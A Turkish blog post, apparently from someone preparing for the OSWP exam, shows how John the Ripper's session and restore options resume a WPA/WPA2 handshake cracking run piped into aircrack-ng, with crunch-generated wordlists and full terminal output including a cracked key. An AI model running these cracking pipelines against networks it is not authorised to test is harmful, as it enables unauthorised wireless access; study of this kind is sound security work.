İçeriğe geç

John, Session, aircrack-ng

Şu OSWP sınavından sonra bakmak istediğim o kadar konu var ki. Bunlardan biride aslında bash script. Powershell çalışırken her şeyin aslında bir objeden oluştuğunu ve birbirine aktarıldığını öğrendmiştim aynı işlemin bash'de de olduğunu biliyorum - pipe'ten bahsediyorum - ama etkili bir şekilde kullanabildiğimi düşünmüyorum açıkçası. mdisec'in Exploit developer serisine başlamadan önce yabacaklarım arasında ruby öğrenmek var exploit serisinden sonra Linux üzerine bir serüvene giriş yapmayı planlıyorum. Hadi hayırlısı...

Neden böyle bir pragrafla giriş yaptım. Beni çok etkileyen bir şey öğrendim diyebilirim ve böyle güzel şeyleri bu kadar geç öğrenmek beni bir yandan da üzüyor. Self-learning ne yazıkki tecrübe eksikliği söz konusu olduğunda çok kötü bir şey...

Elinizde uzun bir wordlist olduğunu hayal edin ve bu wordlist ile bir kırma işlemi yapıyorsunuz. Ne yazık ki bir yerde bu işlemi durdurmanız gerekti. Eğer uzun zamandır kırma işlemi gerçekleştiriyorsanız, süreci durdurup tekrar başlamak size çok fazla zaman kaybı yaratacaktır. Kaldığımız yerden devam etmek isteriz. Bunun için john'un session parametresini kullanacağız. Ben bu parametreye aşık oldum. Son zamanlarda aklıma gelen ve daha sonrasında şunun sıfırdan kodunu yazayim dediğim her şeyin daha önceden yapılmış olması beni günlük hayatta kullandığım bir sürü aracı daha iyi tanımam gerektiği düşüncesine itmekte... Neyse aşağıdaki kodları inceleyelim.

┌──(root💀kali)-[/home/kali/oswp/john]
└─# john --session=wpa --wordlist=/usr/share/john/password.lst --rules --stdout | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
Reading packets, please wait...
Opening wpa-01.cap
1 potential targets

                               Using default input encoding: UTF-8

                   [00:01:29] 363433 keys tested (4140.14 k/s) 

Bir WPA/WPA2 handshake kırmaya çalıştığımızı düşünelim ve belirli bir süre sonra aircrack-ng'yi durdurduk. --restore= ile kaldığımız yerden devam edebiliriz.


┌──(root💀kali)-[/home/kali/oswp/john]
└─# john --restore=wpa  | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
Reading packets, please wait...
Opening wpa-01.cap
1 potential targets

                               Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist

                   [00:02:25] 571928 keys tested (3995.81 k/s) 

                          KEY FOUND! [ Password123 ]

      Master Key     : D9 64 81 73 94 3E C6 80 62 63 D8 4E 1F 54 45 3E 
                       D5 2F 43 2F 91 93 8F 47 56 AB BE B9 CA 5B F9 C7 

      Transient Key  : BF 8F DD E6 B7 7B EE 44 99 FC E3 B9 9D 42 90 39 
                       29 C2 B0 4A 2A 73 CB 96 80 F0 DF E2 F7 C7 ED CA 
                       D8 AD 57 5B C8 31 FF B0 B2 E7 2B 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : 02 27 20 FB B1 1D E8 01 0C 06 3C 34 9F 2A 6F 4A 

Harika ve dahasıda var. Yukarıdaki işlemleri bir wordlist aracılığı ile gerçekleştirdik. Wordlist'i crunch gibi araçlarla generic bir şekilde oluşturarak da bu işlemleri gerçekleştirebilir daha sonrasında kaldığımız yerden devam edebiliriz.

┌──(root💀kali)-[/home/kali/oswp/john]
└─# crunch 8 8 12345678  | john --stdin --session=wpa --stdout | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
Crunch will now generate the following amount of data: 150994944 bytes
144 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 16777216 
Reading packets, please wait...
Opening wpa-01.cap
1 potential targets
                 Using default input encoding: UTF-8

                   [00:00:45] 174763 keys tested (3867.82 k/s) 

Şimdi kaldığımız yerden devam edelim.

┌──(root💀kali)-[/home/kali/oswp/john]
└─# crunch 8 8 12345678  | john --restore=wpa | aircrack-ng -w - wpa-01.cap -b 7A:2B:C1:63:BD:64
Crunch will now generate the following amount of data: 150994944 bytes
144 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 16777216 
Reading packets, please wait...
Opening wpa-01.cap
1 potential targets
                    Proceeding with wordlist:stdin

                   [00:00:39] 151097 keys tested (3804.11 k/s) 

Çok iyi değil mi?

Kategori:Siber GüvenlikWireless

İlk Yorumu Siz Yapın

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir